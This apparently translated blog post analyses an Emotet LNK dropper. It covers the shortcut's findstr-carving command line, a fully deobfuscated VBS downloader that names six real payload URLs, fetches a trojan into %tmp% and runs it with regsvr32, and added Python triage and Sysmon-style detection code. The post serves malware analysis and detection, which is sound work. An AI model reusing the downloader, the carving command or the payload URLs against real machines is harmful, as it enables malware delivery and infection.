Emotet's New Form: LNK Files

Today I came across a new Emotet delivery method.

When I first encountered Emotet it arrived as ordinary Office VBA macro malware; it later moved to Excel 4.0 (XLM) macros, and now a new technique has appeared: delivery through Windows shortcut (LNK) files.

The samples I collected include LNK files that drop a VBS script and ones that drop PowerShell. The VBS-dropping variant is analysed below.

File name: Datos-2504.lnk

MD5: 95e0286c6c38320d9673b6492f9e2284

```bat
C:\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Datos-2504.lnk" > "%tmp%\YlScZcZKeP.vbs" & "%tmp%\YlScZcZKeP.vbs"
```

The shortcut starts cmd.exe with /v:on (delayed environment-variable expansion) and has it run findstr over Datos-2504.lnk. findstr treats "glKmfOKnQLYKnNs.*" as a regular expression and prints every line of the file that contains that marker (not only lines that start with it); the output is redirected to %tmp%\YlScZcZKeP.vbs, and the trailing & then launches that file regardless of findstr's exit code. Because the dropped file ends in .vbs it is executed by the Windows Script Host.

The VBS script is embedded in the LNK file itself, so the first stage needs no download: findstr simply carves the script lines out of the shortcut.
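A small static triage script for droppers of this kind, written for this post as an added example (it is not the author's code and was not run against Datos-2504.lnk): it checks the ShellLinkHeader, recovers the findstr pattern and output path from the shortcut's command line, and emulates findstr's line matching to carve the embedded script. The LNK it parses is constructed inline, with a hypothetical marker MARKER123 and output name drop.vbs in place of the sample's values.

```python
"""Static triage of an LNK dropper that carves its script out of itself with findstr.

Added example for this post, not the post's own code. The sample LNK parsed below is
constructed here (header plus a hypothetical MARKER123 payload), not Datos-2504.lnk.
"""
import re
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} as laid out on disk (little-endian fields)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# cmd.exe /c findstr "<pattern>" "<source file>" > "<output file>"
FINDSTR_RE = re.compile(r'findstr\s+"([^"]+)"\s+"([^"]+)"\s*>\s*"([^"]+)"', re.I)


def is_lnk(data: bytes) -> bool:
    """ShellLinkHeader check: HeaderSize must be 0x4C and the LinkCLSID must follow it."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    return struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def find_findstr_command(data: bytes):
    """Locate the findstr command in the shortcut's arguments.

    LNK StringData (COMMAND_LINE_ARGUMENTS included) is normally UTF-16LE, so the buffer
    is decoded at both byte alignments before falling back to raw bytes.
    Returns (pattern, source, output) or None.
    """
    candidates = [data[i:].decode("utf-16-le", errors="ignore") for i in (0, 1)]
    candidates.append(data.decode("latin-1"))
    for text in candidates:
        m = FINDSTR_RE.search(text)
        if m:
            return m.group(1), m.group(2), m.group(3)
    return None


def findstr_lines(data: bytes, pattern: str) -> list:
    """Emulate `findstr "<pattern>" file`: the argument is a regular expression and every
    line that CONTAINS a match is printed, not only lines that start with it. Only patterns
    built from literals and `.*` are assumed (what the sample uses); findstr's full regex
    dialect differs from Python's.
    """
    rx = re.compile(pattern)
    hits = []
    for line in data.decode("latin-1").split("\n"):  # latin-1 keeps every byte intact
        line = line.rstrip("\r")
        if rx.search(line):
            hits.append(line)
    return hits


def triage(data: bytes) -> dict:
    """Header check, command recovery, payload carving, in one report."""
    result = {"is_lnk": is_lnk(data), "command": None, "script": []}
    cmd = find_findstr_command(data)
    if cmd:
        pattern, source, output = cmd
        result["command"] = {"pattern": pattern, "source": source, "output": output}
        result["script"] = findstr_lines(data, pattern)
    return result


def build_sample() -> bytes:
    """Constructed stand-in for the dropper: a valid-looking ShellLinkHeader, the arguments
    as UTF-16LE behind a CountCharacters field, then the script appended as plain text.
    MARKER123, sample.lnk and drop.vbs are hypothetical names."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + b"\x00" * (LNK_HEADER_SIZE - 20)
    args = '/v:on /c findstr "MARKER123.*" "sample.lnk" > "%tmp%\\drop.vbs" & "%tmp%\\drop.vbs"'
    arguments = struct.pack("<H", len(args)) + args.encode("utf-16-le")
    payload = (
        b"\r\n'MARKER123 hypothetical payload line, not the real script\r\n"
        b'MARKER123 = 1 : MsgBox "dropped"\r\n'
        b"a line without the marker is left behind by findstr\r\n"
    )
    return header + arguments + payload


if __name__ == "__main__":
    report = triage(build_sample())
    print(report["is_lnk"], report["command"])
    print("\n".join(report["script"]))
```

In the constructed sample the marker inside the shortcut's own command line is stored as UTF-16LE, so the byte-wise line scan does not pick the command up and only the script lines appended as plain text come out. The `.*` in the sample's pattern is cosmetic: findstr prints any line containing the marker either way, which is why the emulation uses `search` rather than `match`.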


The dropped YlScZcZKeP.vbs is obfuscated.


Deobfuscating by hand, and by inserting WScript.StdOut.WriteLine calls to print the intermediate strings, yields the readable code below.

```vbscript
' Deobfuscated YlScZcZKeP.vbs. Identifiers and values are the sample's own; comments are editorial.
on error resume next                                   ' swallow every runtime error
Set FSO = CreateObject("Scripting.FileSystemObject")   ' used only for self-deletion at the end

' Base64 -> bytes via MSXML, bytes -> string via ADODB.Stream.
' Used for the URL list and for the regsvr32 argument.
Function Base64Decode(ByVal vCode)
With CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
.dataType = "bin.base64"
.text = vCode
Base64Decode = Stream_BinaryToString(.nodeTypedValue)
End With
End Function

Function Stream_BinaryToString(Binary)
With CreateObject("ADODB.Stream")
.Type = 1            ' adTypeBinary
.Open
.Write Binary
.Position = 0
.Type = 2            ' adTypeText
.CharSet = "utf-8"
Stream_BinaryToString = .ReadText
End With
End Function

' Payload URL list: declared with seven slots, six used. In the original script the
' entries are Base64 strings (hence the Base64Decode call below); they are shown here decoded.
Dim LmPxinnpsd(6)
LmPxinnpsd(0) = "https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/"
LmPxinnpsd(1) = "http://filmmogzivota.rs/SpryAssets/gDR/"
LmPxinnpsd(2) = "http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/"
LmPxinnpsd(3) = "http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/"
LmPxinnpsd(4) = "http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/"
LmPxinnpsd(5) = "http://colegiounamuno.es/cgi-bin/E/"

' The downloader is run through Execute() so it never appears as plain code in the file.
' Its string argument is shown here unescaped and on multiple lines for readability.
Execute("dIm xml,Ws,Db,FiLePaTH,uRL
xml = "MSXml2.SeRVERXmlhtTp.3.0"        ' ProgIDs in random case to dodge case-sensitive signatures
Ws = "wscRipT.SHEll"
Db = "aDodb.STReam"
seT ImSHdnYdVR = CreAteOBjecT(ws)
TmP = imsHdnydvR.EXpANdeNvIroNmEnTSTrIngS("%tmp%")
wiNDiR = iMshDnYdvR.ExPAndenviroNmEnTstRiNgs("%wInDiR%")

FilEPATH = tMp & "\KzcEXkekpr.Zvp"      ' download target: a DLL saved under a non-DLL extension

CaLl prog
SUb PROG
ranDOmize
INDeX = iNT((5 - 0 + 1)*rnD + 0)        ' random index 0..5: one of the six URLs
DiM msXML
seT mSxML = CreateOBJEcT(xmL)
dIM STreAM
sEt stream = crEaTEOBjECT(DB)
MsxML.oPEN "GEt", BasE64Decode(lmPxInNpsd(iNdEX)), FAlse
msXML.sETReQueStheadEr "uSer-AgeNT", "vBKbaQgjyvRRbcgfvlsc"   ' hard-coded junk User-Agent
msxML.SEnd
wiTH stream
.TYPe = 1
.OpEN
.write MsXMl.rEspoNsEBody
.savetOfIlE fILEPATH, 2                 ' 2 = adSaveCreateOverWrite
end WitH
end Sub")

' Base64Decode("XEtaY0VYa0VrcFIuWlZQ") = "\KZcEXkEkpR.ZVP", the file saved above (Windows
' paths are case-insensitive). regsvr32 loads it as a DLL and calls DllRegisterServer
' regardless of the extension.
ImshDnydVr.Exec(windir & "\sySTem32\regsVR32.Exe " & tmp & Base64Decode("XEtaY0VYa0VrcFIuWlZQ"))
FSO.GetFile(WScript.ScriptFullName).delete              ' remove the dropped script
```

As with the earlier VBA macro samples, the script picks one of several download URLs at random, saves the remote-access trojan into %tmp% under a random file name (here with a .Zvp extension rather than .dll), executes it through regsvr32, and then deletes itself.
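Detection logic for this execution chain, added here as an example and not taken from the post: per-event rules for the three stages (cmd.exe carving a script out of a .lnk into %tmp%, a script host running from %tmp%, regsvr32 loading a non-DLL-named file from %tmp%) plus a parent/child correlation across them. The input is constructed Sysmon-style process-creation records; the cmd.exe, wscript.exe and regsvr32.exe command lines follow the sample above, while the profile path C:\Users\user, the ProcessGuid values and the benign regsvr32 event are made up.

```python
"""Detection logic for the LNK -> findstr -> VBS -> regsvr32 chain (added example, not the
post's code). Events are constructed Sysmon-style process-creation records (Event ID 1
field names), not real telemetry; C:\\Users\\user and the GUIDs are invented."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Unexpanded %tmp% (as it appears in cmd.exe's own command line) and the expanded locations.
TEMP_RE = re.compile(r"%tmp%|%temp%|\\appdata\\local\\temp\\|\\windows\\temp\\", re.I)
# findstr reading a .lnk and redirecting its output into a script file in a temp location.
CARVE_RE = re.compile(
    r'findstr\s+.*\.lnk".*>.*(?:%tmp%|%temp%|\\temp\\)[^"]*\.(?:vbs|vbe|js|jse|ps1|bat|cmd)',
    re.I,
)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_temp(path: str) -> bool:
    return TEMP_RE.search(path) is not None


def regsvr32_target(cmdline: str) -> str:
    """Last non-switch argument of a regsvr32 command line, quotes stripped."""
    args = re.findall(r'"[^"]*"|\S+', cmdline)[1:]
    targets = [a.strip('"') for a in args if not a.startswith("/")]
    return targets[-1] if targets else ""


def check_event(ev: dict) -> list:
    """Names of the rules a single process-creation event trips."""
    img = image_name(ev["Image"])
    cmd = ev["CommandLine"]
    hits = []
    if img == "cmd.exe" and CARVE_RE.search(cmd):
        hits.append("findstr_carve_from_lnk")
    if img in SCRIPT_HOSTS and in_temp(cmd):
        hits.append("script_host_from_temp")
    if img == "regsvr32.exe":
        target = regsvr32_target(cmd)
        # regsvr32 ignores the extension; an odd one (.Zvp in the sample) is the tell.
        if in_temp(target) and not target.lower().endswith((".dll", ".ocx")):
            hits.append("regsvr32_non_dll_from_temp")
    return hits


def detect_chain(events: list) -> list:
    """Correlate cmd.exe -> script host -> regsvr32 through ParentProcessGuid.
    Returns (cmd_guid, script_host_guid, regsvr32_guid) for every matching chain."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    chains = []
    for ev in events:
        if "regsvr32_non_dll_from_temp" not in check_event(ev):
            continue
        parent = by_guid.get(ev["ParentProcessGuid"])
        grand = by_guid.get(parent["ParentProcessGuid"]) if parent else None
        if (parent and grand
                and image_name(parent["Image"]) in SCRIPT_HOSTS
                and "findstr_carve_from_lnk" in check_event(grand)):
            chains.append((grand["ProcessGuid"], parent["ProcessGuid"], ev["ProcessGuid"]))
    return chains


SAMPLE_EVENTS = [  # constructed records; B, C and D follow the sample's behaviour
    {"ProcessGuid": "{A}", "ParentProcessGuid": "{0}",
     "Image": "C:\\Windows\\explorer.exe", "CommandLine": "C:\\Windows\\Explorer.EXE"},
    {"ProcessGuid": "{B}", "ParentProcessGuid": "{A}",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'C:\\Windows\\system32\\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" '
                    '"Datos-2504.lnk" > "%tmp%\\YlScZcZKeP.vbs" & "%tmp%\\YlScZcZKeP.vbs"'},
    {"ProcessGuid": "{C}", "ParentProcessGuid": "{B}",
     "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": '"C:\\Windows\\System32\\WScript.exe" '
                    '"C:\\Users\\user\\AppData\\Local\\Temp\\YlScZcZKeP.vbs"'},
    {"ProcessGuid": "{D}", "ParentProcessGuid": "{C}",
     "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "C:\\Windows\\sySTem32\\regsVR32.Exe "
                    "C:\\Users\\user\\AppData\\Local\\Temp\\KZcEXkEkpR.ZVP"},
    {"ProcessGuid": "{E}", "ParentProcessGuid": "{A}",  # benign registration, must not fire
     "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": 'regsvr32.exe /s "C:\\Program Files\\Vendor\\comctl.dll"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["ProcessGuid"], check_event(ev))
    print(detect_chain(SAMPLE_EVENTS))
```

The per-event rules are deliberately narrow (a temp-path regsvr32 target that is not named .dll/.ocx, a script host started from a temp path) so that a legitimate COM registration such as event E stays silent; the chain rule then ties the three stages together by parent GUID, which is the signal worth alerting on even if one of the individual rules is noisy in a given environment.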

References:

https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/

https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/

For more on malicious LNK files, see:

https://bbs.pediy.com/thread-260953.htm


Emotet的新形式-Link
http://wangchenchina.github.io/2022/05/17/Emotet的新形式-Link/
作者
Demo
发布于
2022年5月17日
许可协议